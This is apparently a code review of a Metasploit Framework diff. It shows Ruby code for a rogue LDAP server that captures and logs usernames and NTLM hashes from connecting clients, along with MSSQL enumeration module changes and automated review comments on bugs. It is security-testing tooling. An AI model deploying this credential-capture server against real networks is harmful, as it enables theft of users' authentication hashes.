auth_info[:domain], auth_info[:user] = pub_info
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
end
|
||||
else
|
||||
auth_info[:user] = user_login.name
|
||||
auth_info[:domain] = nil
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
end
|
||||
auth_info[:private] = user_login.authentication
|
||||
auth_info[:private_type] = :password
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported if auth_info[:result_code].nil?
|
||||
auth_info[:auth_type] = 'Simple'
|
||||
auth_info
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Handle SASL authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_sasl_request(user_login, auth_info = {})
|
||||
case user_login.authentication[1]
|
||||
when /NTLMSSP/
|
||||
message = Net::NTLM::Message.parse(user_login.authentication[1])
|
||||
if message.is_a?(::Net::NTLM::Message::Type1)
|
||||
auth_info[:server_creds] = generate_type2_response(message)
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeSaslBindInProgress
|
||||
elsif message.is_a?(::Net::NTLM::Message::Type3)
|
||||
auth_info = handle_type3_message(message, auth_info)
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
end
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
auth_info[:error_msg] = 'Invalid LDAP Login Attempt => Unsupported SASL Format'
|
||||
end
|
||||
auth_info[:auth_type] = 'SASL'
|
||||
auth_info
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
#
|
||||
# Determine if the supplied request is formatted for SASL auth
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
#
|
||||
# @return [bool] True if the request can be processed for SASL auth
|
||||
def sasl?(user_login)
|
||||
if user_login.authentication.is_a?(Array) && SUPPORTS_SASL.include?(user_login.authentication[0])
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate NTLM Type2 response from NTLM Type1 message
|
||||
#
|
||||
# @param message [Net::NTLM::Message::Type1] NTLM Type1 message
|
||||
#
|
||||
# @return server_hash [String] NTLM Type2 response that is sent as server credentials
|
||||
def generate_type2_response(message)
|
||||
dom = message.domain
|
||||
ws = message.workstation
|
||||
domain = dom.empty? ? @domain : dom
|
||||
server = ws.empty? ? @server : ws
|
||||
server_hash = MESSAGE.process_type1_message(message.encode64, @challenge, domain, server, @dnsname, @dnsdomain)
|
||||
Rex::Text.decode_base64(server_hash)
|
||||
end
|
||||
|
||||
#
|
||||
# Handle NTLM Type3 message
|
||||
#
|
||||
# @param message [Net::NTLM::Message::Type3] NTLM Type3 message
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_type3_message(message, auth_info = {})
|
||||
arg = {
|
||||
domain: message.domain,
|
||||
user: message.user,
|
||||
host: message.workstation
|
||||
}
|
||||
|
||||
domain, user, host, lm_hash, ntlm_hash = MESSAGE.process_type3_message(message.encode64)
|
||||
nt_len = ntlm_hash.length
|
||||
|
||||
if nt_len == 48
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_V1_RESPONSE
|
||||
arg[:lm_hash] = lm_hash
|
||||
arg[:nt_hash] = ntlm_hash
|
||||
|
||||
if arg[:lm_hash][16, 32] == '0' * 32
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
end
|
||||
elsif nt_len > 48
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_V2_RESPONSE
|
||||
arg[:lm_hash] = lm_hash[0, 32]
|
||||
arg[:lm_cli_challenge] = lm_hash[32, 16]
|
||||
arg[:nt_hash] = ntlm_hash[0, 32]
|
||||
arg[:nt_cli_challenge] = ntlm_hash[32, nt_len - 32]
|
||||
else
|
||||
auth_info[:error_msg] = "Unknown hash type from #{host}, ignoring ..."
|
||||
end
|
||||
auth_info.merge(process_ntlm_hash(arg)) unless arg.nil?
|
||||
end
|
||||
|
||||
#
|
||||
# Process the NTLM Hash received from NTLM Type3 message
|
||||
#
|
||||
# @param arg [Hash] authentication information received from Type3 message
|
||||
#
|
||||
# @return arg [Hash] Processed NTLM authentication information
|
||||
def process_ntlm_hash(arg = {})
|
||||
ntlm_ver = arg[:ntlm_ver]
|
||||
lm_hash = arg[:lm_hash]
|
||||
nt_hash = arg[:nt_hash]
|
||||
unless ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE || ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
lm_cli_challenge = arg[:lm_cli_challenge]
|
||||
nt_cli_challenge = arg[:nt_cli_challenge]
|
||||
end
|
||||
domain = Rex::Text.to_ascii(arg[:domain])
|
||||
user = Rex::Text.to_ascii(arg[:user])
|
||||
host = Rex::Text.to_ascii(arg[:host])
|
||||
|
||||
case ntlm_ver
|
||||
when NTLM_CONST::NTLM_V1_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V1_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NLMv1 Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
if lm_hash == nt_hash || lm_hash == '' || lm_hash =~ /^0*$/
|
||||
lm_hash_message = 'Disabled'
|
||||
elsif NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [lm_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V1_RESPONSE,
|
||||
type: 'lm'
|
||||
})
|
||||
lm_hash_message = 'Disabled (from empty password)'
|
||||
else
|
||||
lm_hash_message = lm_hash
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 48,
|
||||
nt_hash || '0' * 48
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
when NTLM_CONST::NTLM_V2_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [nt_cli_challenge].pack('H*'),
|
||||
user: user,
|
||||
domain: domain,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V2_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NTLMv2 Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
if (lm_hash == '0' * 32) && (lm_cli_challenge == '0' * 16)
|
||||
lm_hash_message = 'Disabled'
|
||||
elsif NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [lm_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [lm_cli_challenge].pack('H*'),
|
||||
user: user,
|
||||
domain: domain,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V2_RESPONSE,
|
||||
type: 'lm'
|
||||
})
|
||||
lm_hash_message = 'Disabled (from empty password)'
|
||||
else
|
||||
lm_hash_message = lm_hash
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 32,
|
||||
nt_hash || '0' * 32
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
when NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [lm_hash].pack('H*')[0, 8],
|
||||
ntlm_ver: NTLM_CONST::NTLM_2_SESSION_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NTLM2_session Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 48,
|
||||
nt_hash || '0' * 48
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
else
|
||||
return
|
||||
end
|
||||
arg[:domain] = domain
|
||||
arg[:user] = user
|
||||
arg[:host] = host
|
||||
arg[:private_type] = :ntlm_hash
|
||||
arg
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
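Review bot: `handle_type3_message` ends with `auth_info.merge(process_ntlm_hash(arg)) unless arg.nil?`, but `arg` is a hash literal and is never nil, while `process_ntlm_hash` returns nil through its bare `return`s (empty-password hash, or an unset `ntlm_ver`, which is what the `nt_len < 48` branch produces). `merge(nil)` then raises a TypeError on input the remote client controls, and the `arg[:error_msg]` values set just before those returns are discarded. I would write `processed = process_ntlm_hash(arg)` followed by `processed ? auth_info.merge(processed) : auth_info`, and have `process_ntlm_hash` return the hash carrying the error message instead of nil. Separately, `SUPPORTS_SASL = %w[GSS-SPNEGO NLTM]` looks like a typo for `NTLM`, which would make `sasl?` reject binds that name that mechanism.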
+166
-70
@@ -56,12 +56,13 @@ module Rex
|
||||
# @param udp [TrueClass, FalseClass] Listen on UDP socket
|
||||
# @param tcp [TrueClass, FalseClass] Listen on TCP socket
|
||||
# @param ldif [String] LDIF data
|
||||
# @param auth_provider [Rex::Proto::LDAP::Auth] LDAP Authentication provider which processes authentication
|
||||
# @param ctx [Hash] Framework context for sockets
|
||||
# @param dblock [Proc] Handler for :dispatch_request flow control interception
|
||||
# @param sblock [Proc] Handler for :send_response flow control interception
|
||||
#
|
||||
# @return [Rex::Proto::LDAP::Server] LDAP Server object
|
||||
def initialize(lhost = '0.0.0.0', lport = 389, udp = true, tcp = true, ldif = nil, comm = nil, ctx = {}, dblock = nil, sblock = nil)
|
||||
def initialize(lhost = '0.0.0.0', lport = 389, udp = true, tcp = true, ldif = nil, comm = nil, auth_provider = nil, ctx = {}, dblock = nil, sblock = nil)
|
||||
@serve_udp = udp
|
||||
@serve_tcp = tcp
|
||||
@sock_options = {
|
||||
@@ -74,6 +75,7 @@ module Rex
|
||||
self.listener_thread = nil
|
||||
self.dispatch_request_proc = dblock
|
||||
self.send_response_proc = sblock
|
||||
@auth_provider = auth_provider
|
||||
end
|
||||
|
||||
#
|
||||
@@ -109,11 +111,13 @@ module Rex
|
||||
stop
|
||||
raise e
|
||||
end
|
||||
if !serve_udp
|
||||
unless serve_udp
|
||||
self.listener_thread = tcp_sock.listener_thread
|
||||
end
|
||||
end
|
||||
|
||||
@auth_provider ||= Rex::Proto::LDAP::Auth.new(nil, nil, nil, nil, nil)
|
||||
|
||||
self
|
||||
end
|
||||
|
||||
@@ -149,53 +153,90 @@ module Rex
|
||||
#
|
||||
# Default LDAP request dispatcher
|
||||
#
|
||||
# @param cli [Rex::Socket::Tcp, Rex::Socket::Udp] Client sending the request
|
||||
# @param client [Rex::Socket::Tcp, Rex::Socket::Udp] Client sending the request
|
||||
# @param data [String] raw LDAP request data
|
||||
def default_dispatch_request(cli, data)
|
||||
return if data.strip.empty?
|
||||
def default_dispatch_request(client, data)
|
||||
return if data.strip.empty? || data.strip.nil?
|
||||
|
||||
processed_pdu_data = {
|
||||
ip: client.peerhost,
|
||||
port: client.peerport,
|
||||
service_name: 'ldap',
|
||||
post_pdu: false
|
||||
}
|
||||
|
||||
data.extend(Net::BER::Extensions::String)
|
||||
begin
|
||||
pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
|
||||
wlog("LDAP request has remaining data: #{data}") if !data.empty?
|
||||
resp = case pdu.app_tag
|
||||
when Net::LDAP::PDU::BindRequest # bind request
|
||||
cli.authenticated = true
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
Net::LDAP::ResultCodeSuccess,
|
||||
'',
|
||||
'',
|
||||
Net::LDAP::PDU::BindResult
|
||||
)
|
||||
when Net::LDAP::PDU::SearchRequest # search request
|
||||
if cli.authenticated
|
||||
# Perform query against some loaded LDIF structure
|
||||
treebase = pdu.search_parameters[:base_object].to_s
|
||||
# ... search, build packet, send to client
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
Net::LDAP::ResultCodeNoSuchObject, '',
|
||||
Net::LDAP::ResultStrings[Net::LDAP::ResultCodeNoSuchObject],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
)
|
||||
else
|
||||
service.encode_ldap_response(pdu.message_id, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
|
||||
end
|
||||
when Net::LDAP::PDU::UnbindRequest
|
||||
nil # close client, no response can be sent over unbound comm
|
||||
else
|
||||
service.encode_ldap_response(
|
||||
pdu.message_id,
|
||||
Net::LDAP::ResultCodeUnwillingToPerform,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[Net::LDAP::ResultCodeUnwillingToPerform],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
) end
|
||||
resp.nil? ? cli.close : send_response(cli, resp)
|
||||
wlog("LDAP request data remaining: #{data}") unless data.empty?
|
||||
|
||||
res = case pdu.app_tag
|
||||
when Net::LDAP::PDU::BindRequest
|
||||
user_login = pdu.bind_parameters
|
||||
server_creds = ''
|
||||
context_code = nil
|
||||
processed_pdu_data = @auth_provider.process_login_request(user_login).merge(processed_pdu_data)
|
||||
if processed_pdu_data[:result_code] == Net::LDAP::ResultCodeSaslBindInProgress
|
||||
server_creds = processed_pdu_data[:server_creds]
|
||||
context_code = 7
|
||||
else
|
||||
processed_pdu_data[:result_message] = "LDAP Login Attempt => From:#{processed_pdu_data[:ip]}:#{processed_pdu_data[:port]}\t Username:#{processed_pdu_data[:user]}\t #{processed_pdu_data[:private_type]}:#{processed_pdu_data[:private]}\t"
|
||||
processed_pdu_data[:result_message] += " Domain:#{processed_pdu_data[:domain]}" if processed_pdu_data[:domain]
|
||||
processed_pdu_data[:post_pdu] = true
|
||||
end
|
||||
processed_pdu_data[:pdu_type] = pdu.app_tag
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
processed_pdu_data[:result_code],
|
||||
'',
|
||||
Net::LDAP::ResultStrings[processed_pdu_data[:result_code]],
|
||||
Net::LDAP::PDU::BindResult,
|
||||
server_creds,
|
||||
context_code
|
||||
)
|
||||
when Net::LDAP::PDU::SearchRequest
|
||||
filter = Net::LDAP::Filter.parse_ldap_filter(pdu.search_parameters[:filter])
|
||||
attrs = pdu.search_parameters[:attributes].empty? ? :all : pdu.search_parameters[:attributes]
|
||||
res = search_result(filter, pdu.message_id, attrs)
|
||||
if res.nil? || res.empty?
|
||||
result_code = Net::LDAP::ResultCodeNoSuchObject
|
||||
else
|
||||
client.write(res)
|
||||
result_code = Net::LDAP::ResultCodeSuccess
|
||||
end
|
||||
processed_pdu_data[:pdu_type] = pdu.app_tag
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
result_code,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[result_code],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
)
|
||||
when Net::LDAP::PDU::UnbindRequest
|
||||
client.close
|
||||
nil
|
||||
else
|
||||
if suitable_response(pdu.app_tag)
|
||||
result_code = Net::LDAP::ResultCodeUnwillingToPerform
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
result_code,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[result_code],
|
||||
suitable_response(pdu.app_tag)
|
||||
)
|
||||
else
|
||||
client.close
|
||||
end
|
||||
end
|
||||
|
||||
if @pdu_process[pdu.app_tag] && !processed_pdu_data.empty?
|
||||
@pdu_process[pdu.app_tag].call(processed_pdu_data)
|
||||
end
|
||||
send_response(client, res) unless res.nil?
|
||||
rescue StandardError => e
|
||||
elog(e)
|
||||
cli.close
|
||||
client.close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
@@ -203,50 +244,84 @@ module Rex
|
||||
#
|
||||
# Encode response for LDAP client consumption
|
||||
#
|
||||
# @param msgid [Integer] LDAP message identifier
|
||||
# @param code [Integer] LDAP message code
|
||||
# @param dn [String] LDAP distinguished name
|
||||
# @param msg [String] LDAP response message
|
||||
# @param tag [Integer] LDAP response tag
|
||||
# @param msgid [Integer] LDAP message identifier
|
||||
# @param code [Integer] LDAP message code
|
||||
# @param dn [String] LDAP distinguished name
|
||||
# @param msg [String] LDAP response message
|
||||
# @param tag [Integer] LDAP response tag
|
||||
# @param context_data [String] Additional data to serialize in the sequence
|
||||
# @param context_code [Integer] Context Specific code related to `context_data`
|
||||
#
|
||||
# @return [Net::BER::BerIdentifiedOid] LDAP query response
|
||||
def encode_ldap_response(msgid, code, dn, msg, tag)
|
||||
def encode_ldap_response(msgid, code, dn, msg, tag, context_data = nil, context_code = nil)
|
||||
tag_sequence = [
|
||||
code.to_ber_enumerated,
|
||||
dn.to_ber,
|
||||
msg.to_ber
|
||||
]
|
||||
|
||||
if context_data && context_code
|
||||
tag_sequence << context_data.to_ber_contextspecific(context_code)
|
||||
end
|
||||
|
||||
[
|
||||
msgid.to_ber,
|
||||
[
|
||||
code.to_ber_enumerated,
|
||||
dn.to_ber,
|
||||
msg.to_ber
|
||||
].to_ber_appsequence(tag)
|
||||
tag_sequence.to_ber_appsequence(tag)
|
||||
].to_ber_sequence
|
||||
end
|
||||
|
||||
#
|
||||
# Search provided ldif data for query information
|
||||
# Search provided ldif data for query information. If no `ldif` was provided a random search result will be generated.
|
||||
#
|
||||
# @param filter [Net::LDAP::Filter] LDAP query filter
|
||||
# @param attrflt [Array, Symbol] LDAP attribute filter
|
||||
#
|
||||
# @return [Array] Query matches
|
||||
def search_ldif(filter, msgid, attrflt = :all)
|
||||
return [] if @ldif.nil? || @ldif.empty?
|
||||
|
||||
ldif.map do |dn, entry|
|
||||
next unless filter.match(entry)
|
||||
|
||||
def search_result(filter, msgid, attrflt = :all)
|
||||
if @ldif.nil? || @ldif.empty?
|
||||
attrs = []
|
||||
entry.each do |k, v|
|
||||
if attrflt == :all || attrflt.include?(k.downcase)
|
||||
attrvals = v.map(&:to_ber).to_ber_set
|
||||
attrs << [k.to_ber, attrvals].to_ber_sequence
|
||||
if attrflt.is_a?(Array)
|
||||
attrflt.each do |at|
|
||||
attrval = [Rex::Text.rand_text_alphanumeric(10)].map(&:to_ber).to_ber_set
|
||||
attrs << [at.to_ber, attrval].to_ber_sequence
|
||||
end
|
||||
dn = "dc=#{Rex::Text.rand_text_alphanumeric(10)},dc=#{Rex::Text.rand_text_alpha(4)}"
|
||||
appseq = [
|
||||
dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end
|
||||
appseq = [
|
||||
dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end.compact
|
||||
else
|
||||
ldif.map do |bind_dn, entry|
|
||||
next unless filter.match(entry)
|
||||
|
||||
attrs = []
|
||||
entry.each do |k, v|
|
||||
if attrflt == :all || attrflt.include?(k.downcase)
|
||||
attrvals = v.map(&:to_ber).to_ber_set
|
||||
attrs << [k.to_ber, attrvals].to_ber_sequence
|
||||
end
|
||||
end
|
||||
appseq = [
|
||||
bind_dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end.compact.join
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Sets the tasks to be performed after processing of pdu object
|
||||
#
|
||||
# @param proc [Proc] block of code to execute
|
||||
#
|
||||
# @return pdu_process [Proc] steps to be executed
|
||||
def processed_pdu_handler(pdu_type, &proc)
|
||||
@pdu_process = []
|
||||
@pdu_process[pdu_type] = proc if block_given?
|
||||
end
|
||||
|
||||
#
|
||||
@@ -256,6 +331,27 @@ module Rex
|
||||
"#{args[0] || ''}-#{args[1] || ''}-#{args[4] || ''}"
|
||||
end
|
||||
|
||||
#
|
||||
# Get suitable response for a particular request
|
||||
#
|
||||
# @param request [Integer] Type of request
|
||||
#
|
||||
# @return response [Integer] Type of response
|
||||
def suitable_response(request)
|
||||
responses = {
|
||||
Net::LDAP::PDU::BindRequest => Net::LDAP::PDU::BindResult,
|
||||
Net::LDAP::PDU::SearchRequest => Net::LDAP::PDU::SearchResult,
|
||||
Net::LDAP::PDU::ModifyRequest => Net::LDAP::PDU::ModifyResponse,
|
||||
Net::LDAP::PDU::AddRequest => Net::LDAP::PDU::AddResponse,
|
||||
Net::LDAP::PDU::DeleteRequest => Net::LDAP::PDU::DeleteResponse,
|
||||
Net::LDAP::PDU::ModifyRDNRequest => Net::LDAP::PDU::ModifyRDNResponse,
|
||||
Net::LDAP::PDU::CompareRequest => Net::LDAP::PDU::CompareResponse,
|
||||
Net::LDAP::PDU::ExtendedRequest => Net::LDAP::PDU::ExtendedResponse
|
||||
}
|
||||
|
||||
responses[request]
|
||||
end
|
||||
|
||||
#
|
||||
# LDAP server.
|
||||
#
|
||||
@@ -299,7 +395,7 @@ module Rex
|
||||
|
||||
dispatch_request(cli, data)
|
||||
rescue EOFError => e
|
||||
tcp_socket.close_client(cli) if cli
|
||||
tcp_sock.close_client(cli) if cli
|
||||
raise e
|
||||
end
|
||||
|
||||
|
||||
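Review bot: `processed_pdu_handler` assigns `@pdu_process = []` on every call, so registering a handler for a second PDU type discards the first one; `@pdu_process ||= {}` keeps earlier registrations and avoids a sparse array indexed by tag. `default_dispatch_request` reads `@pdu_process[pdu.app_tag]` unconditionally and none of the visible hunks initialise `@pdu_process`, so a server with no handler registered would presumably raise NoMethodError on nil for every request; setting `@pdu_process = {}` in `initialize` would cover that. In the same method, `data.strip.empty? || data.strip.nil?` tests for nil only after `strip` has already been called, so `data.nil? || data.strip.empty?` is the order that actually guards anything. `initialize` and `default_dispatch_request` are only partly inside their hunks.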
@@ -42,8 +42,12 @@ module Rex
|
||||
# @!attribute send_delay
|
||||
# @return [Integer] The delay between sending packets
|
||||
attr_accessor :send_delay
|
||||
# @!attribute initial_connection_info
|
||||
# @return [Hash] Key-value pairs received from the server during the initial MSSQL connection.
|
||||
# See the spec here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tds/b46a581a-39de-4745-b076-ec4dbb7d13ec
|
||||
attr_accessor :initial_connection_info
|
||||
|
||||
def initialize(framework_module, framework, rhost, rport = 1433)
|
||||
def initialize(framework_module, framework, rhost, rport = 1433, proxies = nil)
|
||||
@framework_module = framework_module
|
||||
@framework = framework
|
||||
@connection_timeout = framework_module.datastore['ConnectTimeout'] || 30
|
||||
@@ -60,6 +64,7 @@ module Rex
|
||||
@domain_controller_rhost = framework_module.datastore['DomainControllerRhost'] || ''
|
||||
@rhost = rhost
|
||||
@rport = rport
|
||||
@proxies = proxies
|
||||
end
|
||||
|
||||
#
|
||||
@@ -175,6 +180,7 @@ module Rex
|
||||
|
||||
info = {:errors => []}
|
||||
info = mssql_parse_reply(resp, info)
|
||||
self.initial_connection_info = info
|
||||
|
||||
return false if not info
|
||||
return info[:login_ack] ? true : false
|
||||
@@ -406,6 +412,7 @@ module Rex
|
||||
|
||||
info = {:errors => []}
|
||||
info = mssql_parse_reply(resp, info)
|
||||
self.initial_connection_info = info
|
||||
|
||||
return false if not info
|
||||
info[:login_ack] ? true : false
|
||||
@@ -640,6 +647,25 @@ module Rex
|
||||
print_status("Be sure to cleanup #{var_payload}.exe...")
|
||||
end
|
||||
|
||||
# @param [ENVCHANGE] envchange The ENVCHANGE type to get the information for.
|
||||
# @return [Hash] Returns a hash of values if the provided type exists.
|
||||
# @return [Hash] Returns the whole connection info if envchange is nil.
|
||||
# @return [Hash] Returns an empty hash if the provided type is not present.
|
||||
def initial_info_for_envchange(envchange: nil)
|
||||
return self.initial_connection_info if envchange.nil?
|
||||
return nil unless (self.initial_connection_info && self.initial_connection_info.is_a?(::Hash))
|
||||
|
||||
self.initial_connection_info[:envs]&.select { |hash| hash[:type] == envchange }&.first || {}
|
||||
end
|
||||
|
||||
def address
|
||||
rhost
|
||||
end
|
||||
|
||||
def port
|
||||
rport
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def rhost
|
||||
|
||||
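Review bot: `initial_info_for_envchange` documents three `[Hash]` returns, yet its second guard is `return nil unless (...)`, and with `envchange: nil` it hands back `initial_connection_info` unchanged. Both login hunks assign that attribute before their own `return false if not info` check, so it may hold a non-Hash value. Either the tags should read `@return [Hash, nil]` or the guard should be `return {} unless initial_connection_info.is_a?(::Hash)`. The lookup `select { ... }&.first` can also be written `find { |env| env[:type] == envchange }`. The new `proxies` argument is stored in `@proxies` but nothing in the visible hunks reads it, so it is worth confirming the connect path uses it.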
@@ -32,6 +32,30 @@ module ClientMixin
|
||||
STATUS_RESETCONNECTION = 0x08 # TDS 7.1+
|
||||
STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+
|
||||
|
||||
# Mappings for ENVCHANGE types
|
||||
# See the TDS Specification here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tds/2b3eb7e5-d43d-4d1b-bf4d-76b9e3afc791
|
||||
module ENVCHANGE
|
||||
DATABASE = 1
|
||||
LANGUAGE = 2
|
||||
CHARACTER_SET = 3
|
||||
PACKET_SIZE = 4
|
||||
UNICODE_LOCAL_ID = 5
|
||||
UNICODE_COMPARISON_FLAGS = 6
|
||||
SQL_COLLATION = 7
|
||||
BEGIN_TRANSACTION = 8
|
||||
COMMIT_TRANSACTION = 9
|
||||
ROLLBACK_TRANSACTION = 10
|
||||
ENLIST_DTC_TRANSACTION = 11
|
||||
DEFECT_TRANSACTION = 12
|
||||
REAL_TIME_LOG_SHIPPING = 13
|
||||
PROMOTE_TRANSACTION = 15
|
||||
TRANSACTION_MANAGER_ADDRESS = 16
|
||||
TRANSACTION_ENDED = 17
|
||||
COMPLETION_ACKNOWLEDGEMENT = 18
|
||||
NAME_OF_USER_INSTANCE = 19
|
||||
ROUTING_INFORMATION = 20
|
||||
end
|
||||
|
||||
def mssql_print_reply(info)
|
||||
print_status("SQL Query: #{info[:sql]}")
|
||||
|
||||
@@ -49,7 +73,7 @@ module ClientMixin
|
||||
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => 1,
|
||||
'Header' => "",
|
||||
'Header' => "Response",
|
||||
'Columns' => info[:colnames],
|
||||
'SortIndex' => -1
|
||||
)
|
||||
|
||||
@@ -588,7 +588,15 @@ module DispatcherShell
|
||||
# If the command is unknown...
|
||||
#
|
||||
def unknown_command(method, line)
|
||||
print_error("Unknown command: #{method}")
|
||||
# Map each dispatchers commands to valid_commands
|
||||
valid_commands = dispatcher_stack.flat_map { |dispatcher| dispatcher.commands.keys }
|
||||
|
||||
message = "Unknown command: #{method}."
|
||||
suggestion = DidYouMean::SpellChecker.new(dictionary: valid_commands).correct(method).first
|
||||
message << " Did you mean %grn#{suggestion}%clr?" if suggestion
|
||||
message << ' Run the %grnhelp%clr command for more details.'
|
||||
|
||||
print_error(message)
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
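Review bot: `unknown_command` now references `DidYouMean::SpellChecker` without a guard, so on a Ruby started with `--disable-did_you_mean` every mistyped command would raise NameError instead of printing the error. Making the suggestion conditional keeps the old behaviour there: `suggestion = DidYouMean::SpellChecker.new(dictionary: valid_commands).correct(method).first if defined?(DidYouMean::SpellChecker)`. The new comment would also read better as `# Collect the command names of every dispatcher on the stack`.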
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
|
||||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.165'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.166'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.26'
|
||||
# Needed by msfgui and other rpc components
|
||||
|
||||
@@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -23,11 +24,14 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
print_status("Running MS SQL Server Enumeration...")
|
||||
|
||||
if !mssql_login_datastore
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
unless mssql_login_datastore
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Get Version
|
||||
@@ -39,9 +43,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
print "[*]\t#{row}"
|
||||
end
|
||||
vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Version: #{sqlversion}")
|
||||
|
||||
@@ -71,16 +75,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
# checking for C2 Audit Mode
|
||||
